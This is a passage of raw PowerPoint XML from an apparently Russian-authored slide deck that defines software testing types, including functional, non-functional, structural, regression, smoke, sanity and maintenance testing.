          <a:xfrm>
            <a:off x="958767" y="29249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780928"/>
            <a:ext cx="6588224" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interoperability testing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="340321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3286725"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Functional testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="389623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779748"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Security testing</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576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Non-functional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non-function characteristics are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>“how”</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the system does. Non-functional testing may be performed at all test levels.</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Load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Performance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Stress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Usability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15"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933056"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Maintainability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="440958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4293096"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Portability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="47696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2" name="Прямоугольник 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224136" y="4653136"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Reliability testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="512037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4" name="Прямоугольник 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224136" y="5003884"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Volume testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="54804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6" name="Прямоугольник 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224136" y="5363924"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Installation testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="584045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8" name="Прямоугольник 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1224136" y="5723964"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Configuration testing</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34931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Structural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Structural </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" u="sng" dirty="0" smtClean="0"/>
              <a:t>(white-box)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> testing may be performed at all test levels. It is based on examination of internal (back-end) system behavior.</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Statement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Decision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Condition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Multiple condition testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="611560" y="4078813"/>
            <a:ext cx="7416947" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>All these testing techniques help measure the code coverage: statement coverage, decision coverage, condition coverage etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng"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5052024"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Related to Changes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1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Regression testing may be performed at all test levels, and includes functional, non-functional and structural testing. Regression test suites are run many times and generally evolve slowly, so regression testing is a strong candidate for automation. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" u="sng" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="318544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068960"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Smoke testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Flowchart: Connector 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="936104" y="36174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501008"/>
            <a:ext cx="5652120" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Sanity testing</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19"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3933056"/>
            <a:ext cx="5652120" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Bug regression, old bug regression and side effect testing as parts of regression testing</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5710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Maintenance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2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Once deployed, a software system is often in service for years or decades. During this time the system, its configuration data, or its environment are often corrected, changed or extended.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>So, the maintenance testing is necessary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It is testing the changes to an operational system or the impact of a changed environment to an operational system.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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16489</TotalTime>
  <Words>2358</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Экран (4:3)</PresentationFormat>
  <Paragraphs>270</Paragraphs>
  <Slides>10</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575</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2006-08-16T00:00:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-17T11:23:01Z</dcterms:modified>
</cp:coreProperties>
</file>